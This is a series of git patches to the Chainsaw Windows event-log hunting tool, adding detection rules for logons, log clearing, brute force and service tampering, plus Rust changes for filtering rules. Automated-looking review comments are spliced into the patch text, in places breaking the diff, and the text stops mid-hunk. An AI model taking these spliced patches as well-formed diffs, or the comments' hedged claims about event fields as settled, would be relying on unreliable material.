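Review bot: The filter `Event.System.Provider: Microsoft-Windows-Windows Defender` matches every event the provider emits, not only detections, so the `Threat Name`/`Threat Path` columns will be empty for most hits (signature updates, scan start/stop, configuration changes) and the rule is far noisier than its title suggests. If detections are the intent, add an `Event.System.EventID` selection under `filter:` (the detection and action-taken events, 1116 and 1117, are the usual choice) or say in `description:` that all Defender events are surfaced. The Kaspersky and Sophos rules on the previous line have the same provider-only shape and additionally index `Event.EventData.Data[n]` positionally, which deserves a comment above `fields:` naming the event format the offsets were taken from, since a vendor format change silently shifts the columns.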
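Review bot: The machine-account exclusion `Event.EventData.TargetUserName: $*` looks inverted: computer accounts end with `$` (`HOST$`), and if a trailing `*` in tau means starts-with, this pattern only matches names beginning with `$`, so `not local_ips_or_machine_accounts` does not drop computer-account logons and the rule over-fires on them rather than missing anything; `*$` is probably what was meant, please confirm against tau's wildcard rules before changing it. The same line appears in interactive_logon, network_logon, rdp_logon, service_logon and unlock_logon on the following lines. Minor: `description: An Batch based logon.` should read `A batch-based logon.`, and the network and service descriptions lack a full stop.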
@@ -0,0 +1,41 @@ +--- +title: Interactive Logon +group: Lateral Movement +description: An Interactive based logon. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.EventData.TargetUserName + - name: Logon Type + to: Event.EventData.LogonType + - name: IP Address + to: Event.EventData.IpAddress + + +filter: + condition: interactive and not local_ips_or_machine_accounts + + interactive: + Event.System.EventID: 4624 + Event.EventData.LogonType: 2 + local_ips_or_machine_accounts: + - Event.EventData.IpAddress: + - '-' + - 127.0.0.1 + - ::1 + - Event.EventData.TargetUserName: $* diff --git a/chainsaw_rules/lateral_movement/network_logon.yml.chainsaw b/chainsaw_rules/lateral_movement/network_logon.yml.chainsaw new file mode 100644 index 00000000..2a0c84ff --- /dev/null +++ b/chainsaw_rules/lateral_movement/network_logon.yml.chainsaw @@ -0,0 +1,41 @@ +--- +title: Network Logon +group: Lateral Movement +description: An Network based logon +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.EventData.TargetUserName + - name: Logon Type + to: Event.EventData.LogonType + - name: IP Address + to: Event.EventData.IpAddress + + +filter: + condition: network and not local_ips_or_machine_accounts + + network: + Event.System.EventID: 4624 + Event.EventData.LogonType: 3 + local_ips_or_machine_accounts: + - Event.EventData.IpAddress: + - '-' + - 127.0.0.1 + - ::1 + - Event.EventData.TargetUserName: $* 
diff --git a/chainsaw_rules/lateral_movement/rdp_logon.yml.chainsaw b/chainsaw_rules/lateral_movement/rdp_logon.yml.chainsaw new file mode 100644 index 00000000..6b30d410 --- /dev/null +++ b/chainsaw_rules/lateral_movement/rdp_logon.yml.chainsaw @@ -0,0 +1,41 @@ +--- +title: RDP Logon +group: Lateral Movement +description: An RDP based logon. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.EventData.TargetUserName + - name: Logon Type + to: Event.EventData.LogonType + - name: IP Address + to: Event.EventData.IpAddress + + +filter: + condition: rdp and not local_ips_or_machine_accounts + + rdp: + Event.System.EventID: 4624 + Event.EventData.LogonType: 10 + local_ips_or_machine_accounts: + - Event.EventData.IpAddress: + - '-' + - 127.0.0.1 + - ::1 + - Event.EventData.TargetUserName: $* diff --git a/chainsaw_rules/lateral_movement/service_logon.yml.chainsaw b/chainsaw_rules/lateral_movement/service_logon.yml.chainsaw new file mode 100644 index 00000000..3a445b98 --- /dev/null +++ b/chainsaw_rules/lateral_movement/service_logon.yml.chainsaw 
@@ -0,0 +1,41 @@ +--- +title: Service Logon +group: Lateral Movement +description: An Service based logon +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.EventData.TargetUserName + - name: Logon Type + to: Event.EventData.LogonType + - name: IP Address + to: Event.EventData.IpAddress + + +filter: + condition: service and not local_ips_or_machine_accounts + + service: + Event.System.EventID: 4624 + Event.EventData.LogonType: 5 + local_ips_or_machine_accounts: + - Event.EventData.IpAddress: + - '-' + - 127.0.0.1 + - ::1 + - Event.EventData.TargetUserName: $* diff --git a/chainsaw_rules/lateral_movement/unlock_logon.yml.chainsaw b/chainsaw_rules/lateral_movement/unlock_logon.yml.chainsaw new file mode 100644 index 00000000..74ab79a8 --- /dev/null +++ b/chainsaw_rules/lateral_movement/unlock_logon.yml.chainsaw @@ -0,0 +1,40 @@ +--- +title: Unlock Logon +group: Lateral Movement +description: An Unlock based logon. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.EventData.TargetUserName + - name: Logon Type + to: Event.EventData.LogonType + - name: IP Address + to: Event.EventData.IpAddress + + +filter: + condition: unlock and not local_ips_or_machine_accounts + + unlock: + Event.System.EventID: 4624 + Event.EventData.LogonType: 7 + local_ips_or_machine_accounts: + - Event.EventData.IpAddress: + - '-' + - 127.0.0.1 + - ::1 + - Event.EventData.TargetUserName: $* 
diff --git a/chainsaw_rules/log_tampering/security_audit_log_was_cleared.yml.chainsaw b/chainsaw_rules/log_tampering/security_audit_log_was_cleared.yml.chainsaw new file mode 100644 index 00000000..bd010f2f --- /dev/null +++ b/chainsaw_rules/log_tampering/security_audit_log_was_cleared.yml.chainsaw @@ -0,0 +1,32 @@ +--- +title: Security Audit Logs Cleared +group: Log Tampering +description: The security audit logs were cleared. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.UserData.LogFileCleared.SubjectUserName + + +filter: + condition: security_log_cleared and not empty + + security_log_cleared: + Event.System.EventID: 1102 + empty: + Event.UserData.LogFileCleared.SubjectUserName: diff --git a/chainsaw_rules/log_tampering/system_log_was_cleared.yml.chainsaw b/chainsaw_rules/log_tampering/system_log_was_cleared.yml.chainsaw new file mode 100644 index 00000000..a3a6ad6c --- /dev/null +++ b/chainsaw_rules/log_tampering/system_log_was_cleared.yml.chainsaw @@ -0,0 +1,32 @@ +--- +title: System Logs Cleared +group: Log Tampering +description: The system logs were cleared. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID + - name: Computer + to: Event.System.Computer + - name: User + to: Event.UserData.LogFileCleared.SubjectUserName + + +filter: + condition: system_log_cleared and not empty + + system_log_cleared: + Event.System.EventID: 104 + empty: + Event.UserData.LogFileCleared.SubjectUserName: 
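Review bot: As far as I know, event 104 from Microsoft-Windows-Eventlog is raised when any non-Security log is cleared, with the log name in `Event.UserData.LogFileCleared.Channel`, so `title: System Logs Cleared` is narrower than what `Event.System.EventID: 104` matches (Application, Setup and operational channels included). Either add `- name: Channel` / `to: Event.UserData.LogFileCleared.Channel` under `fields:` so the analyst sees which log was cleared, or add `Event.UserData.LogFileCleared.Channel: System` to the selection and keep the title. In both log-tampering rules on this line the `empty:` identifier is given a null value; a comment such as `# null matches a missing/empty SubjectUserName` would make the intended semantics explicit, assuming that is how the rule parser treats it.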
diff --git a/chainsaw_rules/login_attacks/account_brute_force.yml.chainsaw b/chainsaw_rules/login_attacks/account_brute_force.yml.chainsaw new file mode 100644 index 00000000..9935fe9e --- /dev/null +++ b/chainsaw_rules/login_attacks/account_brute_force.yml.chainsaw @@ -0,0 +1,34 @@ +--- +title: Account Brute Force +group: Login Attacks +description: An account that appears to have been brute forced. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: User + to: Event.EventData.TargetUserName + + +filter: + condition: failed_logons and not empty + + failed_logons: + Event.System.EventID: 4625 + empty: + Event.EventData.TargetUserName: 'null' + + +aggregate: + count: '>5' + fields: + - Event.EventData.TargetUserName diff --git a/chainsaw_rules/service_tampering/event_log.yml.chainsaw b/chainsaw_rules/service_tampering/event_log.yml.chainsaw new file mode 100644 index 00000000..54c9414c --- /dev/null +++ b/chainsaw_rules/service_tampering/event_log.yml.chainsaw @@ -0,0 +1,31 @@ +--- +title: Windows Event Log Stopped +group: Service Tampering +description: The Windows Event Log service has been stopped. +authors: + - FranticTyping + + +kind: evtx +level: info +status: stable +timestamp: Event.System.TimeCreated + + +fields: + - name: Event ID + to: Event.System.EventID + - name: Record ID + to: Event.System.EventRecordID + - name: Computer + to: Event.System.Computer + - name: Service Name + to: Event.EventData.param1 + - name: Action + to: Event.EventData.param2 + + +filter: + Event.System.EventID: 7040 + Event.EventData.param1: Windows Event Log + Event.EventData.param2: disabled From 2c93e0536a5892b088cf2943d0ab1ed61e791f0a Mon Sep 17 00:00:00 2001 
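Review bot: `count: '>5'` keyed only on `Event.EventData.TargetUserName` has no time bound and no source, so any account with six failed logons anywhere in the input trips it while a spray of a few passwords against many accounts never does; if the aggregate supports it, keying on `Event.EventData.IpAddress` as well, and listing it, `Event.EventData.WorkstationName` and `Event.System.Computer` under `fields:`, gives the analyst a source to pivot on. The `empty:` selection compares `TargetUserName` with the literal string `'null'`, which only works if the normaliser really writes that text for missing values; a comment stating that above `empty:` would save the next reader a trip to the source.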
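Review bot: The 7040 selection keys on `Event.EventData.param2: disabled`, but in the Service Control Manager's 7040 message ("The start type of the %1 service was changed from %2 to %3") param2 is, as far as I recall, the previous start type and param3 the new one, in which case this rule fires when the service is changed *from* disabled and misses the tampering case the title describes; please confirm the field order against a captured 7040 and switch to `Event.EventData.param3: disabled` if so. `title: Windows Event Log Stopped` also overstates what 7040 records (a start-type change, not a stop), so a `description:` along the lines of `The start type of the Windows Event Log service was changed to disabled.` would be more accurate.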
From: FranticTyping Date: Fri, 24 Jun 2022 00:53:05 +0100 Subject: [PATCH 41/77] renaming chainsaw rules --- .../{new_user_created.yml.chainsaw => new_user_created.yml} | 0 ..._global_group.yml.chainsaw => user_added_to_global_group.yml} | 0 ...to_local_group.yml.chainsaw => user_added_to_local_group.yml} | 0 ...rsal_group.yml.chainsaw => user_added_to_universal_group.yml} | 0 chainsaw_rules/antivirus/{f-secure.yml.chainsaw => f-secure.yml} | 0 .../antivirus/{kaspersky.yml.chainsaw => kaspersky.yml} | 0 chainsaw_rules/antivirus/{sophos.yml.chainsaw => sophos.yml} | 0 .../{windows_defender.yml.chainsaw => windows_defender.yml} | 0 .../{batch_logon.yml.chainsaw => batch_logon.yml} | 0 .../{interactive_logon.yml.chainsaw => interactive_logon.yml} | 0 .../{network_logon.yml.chainsaw => network_logon.yml} | 0 .../lateral_movement/{rdp_logon.yml.chainsaw => rdp_logon.yml} | 0 .../{service_logon.yml.chainsaw => service_logon.yml} | 0 .../{unlock_logon.yml.chainsaw => unlock_logon.yml} | 1 + ...s_cleared.yml.chainsaw => security_audit_log_was_cleared.yml} | 0 ...m_log_was_cleared.yml.chainsaw => system_log_was_cleared.yml} | 0 ...{account_brute_force.yml.chainsaw => account_brute_force.yml} | 0 .../service_tampering/{event_log.yml.chainsaw => event_log.yml} | 0 18 files changed, 1 insertion(+) rename chainsaw_rules/account_tampering/{new_user_created.yml.chainsaw => new_user_created.yml} (100%) rename chainsaw_rules/account_tampering/{user_added_to_global_group.yml.chainsaw => user_added_to_global_group.yml} (100%) rename chainsaw_rules/account_tampering/{user_added_to_local_group.yml.chainsaw => user_added_to_local_group.yml} (100%) rename chainsaw_rules/account_tampering/{user_added_to_universal_group.yml.chainsaw => user_added_to_universal_group.yml} (100%) rename chainsaw_rules/antivirus/{f-secure.yml.chainsaw => f-secure.yml} (100%) rename chainsaw_rules/antivirus/{kaspersky.yml.chainsaw => kaspersky.yml} (100%) rename chainsaw_rules/antivirus/{sophos.yml.chainsaw => 
sophos.yml} (100%)
 rename chainsaw_rules/antivirus/{windows_defender.yml.chainsaw => windows_defender.yml} (100%)
 rename chainsaw_rules/lateral_movement/{batch_logon.yml.chainsaw => batch_logon.yml} (100%)
 rename chainsaw_rules/lateral_movement/{interactive_logon.yml.chainsaw => interactive_logon.yml} (100%)
 rename chainsaw_rules/lateral_movement/{network_logon.yml.chainsaw => network_logon.yml} (100%)
 rename chainsaw_rules/lateral_movement/{rdp_logon.yml.chainsaw => rdp_logon.yml} (100%)
 rename chainsaw_rules/lateral_movement/{service_logon.yml.chainsaw => service_logon.yml} (100%)
 rename chainsaw_rules/lateral_movement/{unlock_logon.yml.chainsaw => unlock_logon.yml} (95%)
 rename chainsaw_rules/log_tampering/{security_audit_log_was_cleared.yml.chainsaw => security_audit_log_was_cleared.yml} (100%)
 rename chainsaw_rules/log_tampering/{system_log_was_cleared.yml.chainsaw => system_log_was_cleared.yml} (100%)
 rename chainsaw_rules/login_attacks/{account_brute_force.yml.chainsaw => account_brute_force.yml} (100%)
 rename chainsaw_rules/service_tampering/{event_log.yml.chainsaw => event_log.yml} (100%)
diff --git a/chainsaw_rules/account_tampering/new_user_created.yml.chainsaw b/chainsaw_rules/account_tampering/new_user_created.yml
similarity index 100%
rename from chainsaw_rules/account_tampering/new_user_created.yml.chainsaw
rename to chainsaw_rules/account_tampering/new_user_created.yml
diff --git a/chainsaw_rules/account_tampering/user_added_to_global_group.yml.chainsaw b/chainsaw_rules/account_tampering/user_added_to_global_group.yml
similarity index 100%
rename from chainsaw_rules/account_tampering/user_added_to_global_group.yml.chainsaw
rename to chainsaw_rules/account_tampering/user_added_to_global_group.yml
diff --git a/chainsaw_rules/account_tampering/user_added_to_local_group.yml.chainsaw b/chainsaw_rules/account_tampering/user_added_to_local_group.yml
similarity index 100%
rename from chainsaw_rules/account_tampering/user_added_to_local_group.yml.chainsaw
rename to chainsaw_rules/account_tampering/user_added_to_local_group.yml
diff --git a/chainsaw_rules/account_tampering/user_added_to_universal_group.yml.chainsaw b/chainsaw_rules/account_tampering/user_added_to_universal_group.yml
similarity index 100%
rename from chainsaw_rules/account_tampering/user_added_to_universal_group.yml.chainsaw
rename to chainsaw_rules/account_tampering/user_added_to_universal_group.yml
diff --git a/chainsaw_rules/antivirus/f-secure.yml.chainsaw b/chainsaw_rules/antivirus/f-secure.yml
similarity index 100%
rename from chainsaw_rules/antivirus/f-secure.yml.chainsaw
rename to chainsaw_rules/antivirus/f-secure.yml
diff --git a/chainsaw_rules/antivirus/kaspersky.yml.chainsaw b/chainsaw_rules/antivirus/kaspersky.yml
similarity index 100%
rename from chainsaw_rules/antivirus/kaspersky.yml.chainsaw
rename to chainsaw_rules/antivirus/kaspersky.yml
diff --git a/chainsaw_rules/antivirus/sophos.yml.chainsaw b/chainsaw_rules/antivirus/sophos.yml
similarity index 100%
rename from chainsaw_rules/antivirus/sophos.yml.chainsaw
rename to chainsaw_rules/antivirus/sophos.yml
diff --git a/chainsaw_rules/antivirus/windows_defender.yml.chainsaw b/chainsaw_rules/antivirus/windows_defender.yml
similarity index 100%
rename from chainsaw_rules/antivirus/windows_defender.yml.chainsaw
rename to chainsaw_rules/antivirus/windows_defender.yml
diff --git a/chainsaw_rules/lateral_movement/batch_logon.yml.chainsaw b/chainsaw_rules/lateral_movement/batch_logon.yml
similarity index 100%
rename from chainsaw_rules/lateral_movement/batch_logon.yml.chainsaw
rename to chainsaw_rules/lateral_movement/batch_logon.yml
diff --git a/chainsaw_rules/lateral_movement/interactive_logon.yml.chainsaw b/chainsaw_rules/lateral_movement/interactive_logon.yml similarity index 100% rename from chainsaw_rules/lateral_movement/interactive_logon.yml.chainsaw rename to chainsaw_rules/lateral_movement/interactive_logon.yml diff --git a/chainsaw_rules/lateral_movement/network_logon.yml.chainsaw b/chainsaw_rules/lateral_movement/network_logon.yml similarity index 100% rename from chainsaw_rules/lateral_movement/network_logon.yml.chainsaw rename to chainsaw_rules/lateral_movement/network_logon.yml diff --git a/chainsaw_rules/lateral_movement/rdp_logon.yml.chainsaw b/chainsaw_rules/lateral_movement/rdp_logon.yml similarity index 100% rename from chainsaw_rules/lateral_movement/rdp_logon.yml.chainsaw rename to chainsaw_rules/lateral_movement/rdp_logon.yml diff --git a/chainsaw_rules/lateral_movement/service_logon.yml.chainsaw b/chainsaw_rules/lateral_movement/service_logon.yml similarity index 100% rename from chainsaw_rules/lateral_movement/service_logon.yml.chainsaw rename to chainsaw_rules/lateral_movement/service_logon.yml diff --git a/chainsaw_rules/lateral_movement/unlock_logon.yml.chainsaw b/chainsaw_rules/lateral_movement/unlock_logon.yml similarity index 95% rename from chainsaw_rules/lateral_movement/unlock_logon.yml.chainsaw rename to chainsaw_rules/lateral_movement/unlock_logon.yml index 74ab79a8..f5f798b3 100644 --- a/chainsaw_rules/lateral_movement/unlock_logon.yml.chainsaw +++ b/chainsaw_rules/lateral_movement/unlock_logon.yml @@ -9,6 +9,7 @@ authors: kind: evtx level: info status: stable +timestamp: Event.System.TimeCreated fields: diff --git a/chainsaw_rules/log_tampering/security_audit_log_was_cleared.yml.chainsaw b/chainsaw_rules/log_tampering/security_audit_log_was_cleared.yml similarity index 100% rename from chainsaw_rules/log_tampering/security_audit_log_was_cleared.yml.chainsaw rename to chainsaw_rules/log_tampering/security_audit_log_was_cleared.yml 
diff --git a/chainsaw_rules/log_tampering/system_log_was_cleared.yml.chainsaw b/chainsaw_rules/log_tampering/system_log_was_cleared.yml
similarity index 100%
rename from chainsaw_rules/log_tampering/system_log_was_cleared.yml.chainsaw
rename to chainsaw_rules/log_tampering/system_log_was_cleared.yml
diff --git a/chainsaw_rules/login_attacks/account_brute_force.yml.chainsaw b/chainsaw_rules/login_attacks/account_brute_force.yml
similarity index 100%
rename from chainsaw_rules/login_attacks/account_brute_force.yml.chainsaw
rename to chainsaw_rules/login_attacks/account_brute_force.yml
diff --git a/chainsaw_rules/service_tampering/event_log.yml.chainsaw b/chainsaw_rules/service_tampering/event_log.yml
similarity index 100%
rename from chainsaw_rules/service_tampering/event_log.yml.chainsaw
rename to chainsaw_rules/service_tampering/event_log.yml
From b4f0497dfa32d85da829dfd0c3f87410acd194a0 Mon Sep 17 00:00:00 2001
From: FranticTyping
Date: Sat, 25 Jun 2022 13:17:59 +0100
Subject: [PATCH 42/77] fix: incorrect merge fix
---
 src/ext/tau.rs | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/src/ext/tau.rs b/src/ext/tau.rs
index 362b0f70..7d5609f9 100644
--- a/src/ext/tau.rs
+++ b/src/ext/tau.rs
@@ -41,7 +41,7 @@ pub fn parse_kv(kv: &str) -> crate::Result {
 let mut not = false;
 let (field, key) = if key.starts_with("int(") && key.ends_with(')') {
 let key = key[4..key.len() - 1].to_owned();
- (Expression::Cast(key.to_owned(), MiscSym::Int), key)
+ (Expression::Cast(key.to_owned(), ModSym::Int), key)
 } else if key.starts_with("not(") && key.ends_with(')') {
 not = true;
 let key = key[4..key.len() - 1].to_owned();
From 3fefda88cdfe0608b4e56ccda3a088074bf2e773 Mon Sep 17 00:00:00 2001
From: FranticTyping
Date: Sat, 25 Jun 2022 13:30:24 +0100
Subject: [PATCH 43/77] chore: bumping cargo to alpha 6
---
 Cargo.toml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/Cargo.toml b/Cargo.toml
index 10dc50c7..ee1e2088 100644
--- a/Cargo.toml
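Review bot: `key.to_owned()` on the corrected line clones a `String` that was itself produced by `.to_owned()` one line up, and `key` is then moved into the tuple anyway; `key.clone()` says what is happening, or bind the cast's argument once so only a single owned copy is needed. Nothing in the hunk rejects an empty name, so `int()` (and `not()` in the following branch) yield a cast of an empty field; if parse_kv's callers do not validate this elsewhere, an `if key.is_empty()` check returning an error here would surface the malformed rule at load time rather than at match time. parse_kv starts and ends outside the hunk.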
+++ b/Cargo.toml @@ -1,9 +1,9 @@ [package] name = "chainsaw" -version = "2.0.0-alpha.5" +version = "2.0.0-alpha.6" repository = "https://github.com/countercept/chainsaw" description = "Rapidly Search and Hunt Through Windows Event Logs" -authors = ["James Dorgan ","Alex Kornitzer "] +authors = ["James Dorgan ","Alex Kornitzer "] readme = "README.md" license = "GPL3" edition = "2021" From 3e6d64a73b3e8ac42431473f02e8f55d6eee29c7 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Sun, 26 Jun 2022 18:22:03 +0100 Subject: [PATCH 44/77] feat: allow rules to be filtered by kind, level and status This is initial support, the structure and parsing needs a clean which I will do next, this refactor will also then let us handle additional fields better for outputting etc. --- Cargo.lock | 9 ++++++- src/lib.rs | 5 +++- src/main.rs | 60 ++++++++++++++++++++++++++++++++++++++------ src/rule/chainsaw.rs | 38 +++++++++++++++++++++++++--- src/rule/mod.rs | 48 +++++++++++++++++++++++++++++------ 5 files changed, 138 insertions(+), 22 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index 3959d1de..a5754deb 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -117,6 +117,12 @@ version = "1.4.3" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "14c189c53d098945499cdfa7ecc63567cf3886b3332b312a5b4585d8d3a6a610" +[[package]] +name = "bytesize" +version = "1.1.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "6c58ec36aac5066d5ca17df51b3e70279f5670a72102f5752cb7e7c856adfc70" + [[package]] name = "camino" version = "1.0.9" @@ -156,10 +162,11 @@ checksum = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd" [[package]] name = "chainsaw" -version = "2.0.0-alpha.5" +version = "2.0.0-alpha.6" dependencies = [ "aho-corasick 0.7.18", "anyhow", + "bytesize", "chrono", "chrono-tz", "colour", diff --git a/src/lib.rs b/src/lib.rs index cfc722e2..1aef655d 100644 --- a/src/lib.rs +++ b/src/lib.rs 
@@ -5,7 +5,10 @@ pub(crate) use anyhow::Result; pub use file::{evtx, get_files, Reader}; pub use hunt::{Hunter, HunterBuilder}; -pub use rule::{chainsaw::Filter, lint_rule, load_rule, sigma, Kind as RuleKind}; +pub use rule::{ + chainsaw::Filter, lint_rule, load_rule, sigma, Kind as RuleKind, Level as RuleLevel, + Status as RuleStatus, +}; pub use search::{Searcher, SearcherBuilder}; pub use write::{set_writer, Format, Writer, WRITER}; diff --git a/src/main.rs b/src/main.rs index 1f6c96cc..11fba64b 100644 --- a/src/main.rs +++ b/src/main.rs @@ -1,7 +1,7 @@ #[macro_use] extern crate chainsaw; -extern crate bytesize; +use std::collections::HashSet; use std::fs::File; use std::path::PathBuf; @@ -13,8 +13,8 @@ use chrono_tz::Tz; use structopt::StructOpt; use chainsaw::{ - cli, get_files, lint_rule, load_rule, set_writer, Filter, Format, Hunter, RuleKind, Searcher, - Writer, + cli, get_files, lint_rule, load_rule, set_writer, Filter, Format, Hunter, RuleKind, RuleLevel, + RuleStatus, Searcher, Writer, }; #[derive(StructOpt)] @@ -65,6 +65,12 @@ enum Command { /// Print the output in json format. #[structopt(group = "format", long = "json")] json: bool, + /// Restrict loaded rules to specified kinds. + #[structopt(long = "kind", number_of_values = 1)] + kinds: Vec, + /// Restrict loaded rules to specified levels. + #[structopt(long = "level", number_of_values = 1)] + levels: Vec, /// Allow chainsaw to try and load files it cannot identify. #[structopt(long = "load-unknown")] load_unknown: bool, @@ -83,6 +89,9 @@ enum Command { /// Continue to hunt when an error is encountered. #[structopt(long = "skip-errors")] skip_errors: bool, + /// Restrict loaded rules to specified statuses. + #[structopt(long = "status", number_of_values = 1)] + statuses: Vec, /// Output the timestamp using the timezone provided. #[structopt(long = "timezone", group = "tz")] timezone: Option, 
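Review bot: The help strings for the new `--kind`, `--level` and `--status` options do not say which values are accepted, so a user only discovers them from the `FromStr` error after a failed run. Since the accepted words are fixed by the parsers in `src/rule/chainsaw.rs` and `src/rule/mod.rs`, either list them in the doc comments, e.g. `/// Restrict loaded rules to specified kinds (chainsaw, sigma or stalker).`, `/// Restrict loaded rules to specified levels (critical, high, medium, low or info).` and `/// Restrict loaded rules to specified statuses (stable or experimental).`, or attach `possible_values` to the structopt attributes so clap validates and prints them itself. The enclosing `Command` enum starts and ends outside the hunk.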
@@ -227,11 +236,14 @@ fn run() -> Result<()> { from, full, json, + kinds, + levels, local, metadata, output, quiet, skip_errors, + statuses, timezone, to, } => { @@ -243,17 +255,49 @@ fn run() -> Result<()> { if let Some(rule) = rule { rules.extend(rule) }; - cs_eprintln!("[+] Loading event logs from: {:?}", path); - cs_eprintln!("[+] Loading detection rules from: {:?}", rules); + + cs_eprintln!( + "[+] Loading event logs from: {}", + path.iter() + .map(|p| p.display().to_string()) + .collect::>() + .join(", ") + ); + + cs_eprintln!( + "[+] Loading detection rules from: {}", + rules + .iter() + .map(|r| r.display().to_string()) + .collect::>() + .join(", ") + ); + let kinds: Option> = if kinds.is_empty() { + None + } else { + Some(HashSet::from_iter(kinds.into_iter())) + }; + let levels: Option> = if levels.is_empty() { + None + } else { + Some(HashSet::from_iter(levels.into_iter())) + }; + let statuses: Option> = if statuses.is_empty() { + None + } else { + Some(HashSet::from_iter(statuses.into_iter())) + }; let mut failed = 0; let mut count = 0; let mut rs = vec![]; for path in &rules { for file in get_files(path, &None, skip_errors)? { - match load_rule(&file, &mapping.is_some()) { + match load_rule(&file, &mapping.is_some(), &kinds, &levels, &statuses) { Ok(mut r) => { - count += 1; - rs.append(&mut r) + if !r.is_empty() { + count += 1; + rs.append(&mut r) + } } Err(e) => { // Hacky way of exposing rule types from load_rule function diff --git a/src/rule/chainsaw.rs b/src/rule/chainsaw.rs index 29cd9244..7d52f70f 100644 --- a/src/rule/chainsaw.rs +++ b/src/rule/chainsaw.rs @@ -2,6 +2,7 @@ use std::fmt; use std::fs::File; use std::io::Read; use std::path::Path; +use std::str::FromStr; use serde::{ de::{self, MapAccess, Visitor}, @@ -133,7 +134,7 @@ pub enum Format { Json, } -#[derive(Clone, Debug, Deserialize, Serialize)] +#[derive(Clone, Debug, Eq, Hash, PartialEq, Deserialize, Serialize)] #[serde(rename_all = "snake_case")] pub enum Level { Critical, 
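Review bot: The three `Option<HashSet<_>>` conversions after the loading banners are the same six lines repeated, and `HashSet::from_iter(kinds.into_iter())` is the long form of `collect()`. Each can be one line, e.g. `let kinds: Option<HashSet<RuleKind>> = (!kinds.is_empty()).then(|| kinds.into_iter().collect());` (likewise for `levels` and `statuses`), or a tiny generic helper if you prefer the intent named once. The two `cs_eprintln!` blocks also build the same `join(", ")` string twice; a local closure over `&[PathBuf]` would remove that repetition. The enclosing `run()` starts and ends outside the hunk.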
@@ -155,22 +156,51 @@ impl fmt::Display for Level { } } -#[derive(Clone, Debug, Deserialize, Serialize)] +impl FromStr for Level { + type Err = anyhow::Error; + + fn from_str(s: &str) -> Result { + let v = match s { + "critical" => Self::Critical, + "high" => Self::High, + "medium" => Self::Medium, + "low" => Self::Low, + "info" => Self::Info, + _ => anyhow::bail!("unknown level, must be: critical, high, medium, low or info"), + }; + Ok(v) + } +} + +#[derive(Clone, Debug, Eq, Hash, PartialEq, Deserialize, Serialize)] #[serde(rename_all = "snake_case")] pub enum Status { Stable, - Testing, + Experimental, } impl fmt::Display for Status { fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { match self { Self::Stable => write!(f, "stable"), - Self::Testing => write!(f, "testing"), + Self::Experimental => write!(f, "experimental"), } } } +impl FromStr for Status { + type Err = anyhow::Error; + + fn from_str(s: &str) -> Result { + let v = match s { + "stable" => Self::Stable, + "experimental" => Self::Experimental, + _ => anyhow::bail!("unknown status, must be: stable or experimental"), + }; + Ok(v) + } +} + #[derive(Clone, Debug, Deserialize)] pub struct Rule { #[serde(alias = "title")] diff --git a/src/rule/mod.rs b/src/rule/mod.rs index 016dc959..e7d44ba5 100644 --- a/src/rule/mod.rs +++ b/src/rule/mod.rs @@ -1,3 +1,4 @@ +use std::collections::HashSet; use std::fmt; use std::path::Path; use std::str::FromStr; @@ -6,7 +7,7 @@ use serde::{Deserialize, Serialize}; use crate::file::Kind as FileKind; -pub use self::chainsaw::{Filter, Rule as Chainsaw}; +pub use self::chainsaw::{Filter, Level, Rule as Chainsaw, Status}; pub use self::sigma::Rule as Sigma; pub use self::stalker::Rule as Stalker; 
@@ -58,7 +59,13 @@ pub struct Rule { pub kind: Kind, } -pub fn load_rule(path: &Path, mapping: &bool) -> crate::Result> { +pub fn load_rule( + path: &Path, + mapping: &bool, + kinds: &Option>, + levels: &Option>, + statuses: &Option>, +) -> crate::Result> { if let Some(x) = path.extension() { if x != "yml" && x != "yaml" { anyhow::bail!("rule must have a yaml file extension"); @@ -66,7 +73,12 @@ pub fn load_rule(path: &Path, mapping: &bool) -> crate::Result> { } // This is a bit crude but we try all formats then report the errors... - let rules = if let Ok(rule) = chainsaw::load(path) { + let mut rules = if let Ok(rule) = chainsaw::load(path) { + if let Some(kinds) = kinds.as_ref() { + if !kinds.contains(&Kind::Chainsaw) { + return Ok(vec![]); + } + } vec![Rule { chainsaw: rule, kind: Kind::Chainsaw, @@ -76,6 +88,11 @@ pub fn load_rule(path: &Path, mapping: &bool) -> crate::Result> { // Hacky way of exposing rule types from load_rule function anyhow::bail!("sigma-no-mapping"); } + if let Some(kinds) = kinds.as_ref() { + if 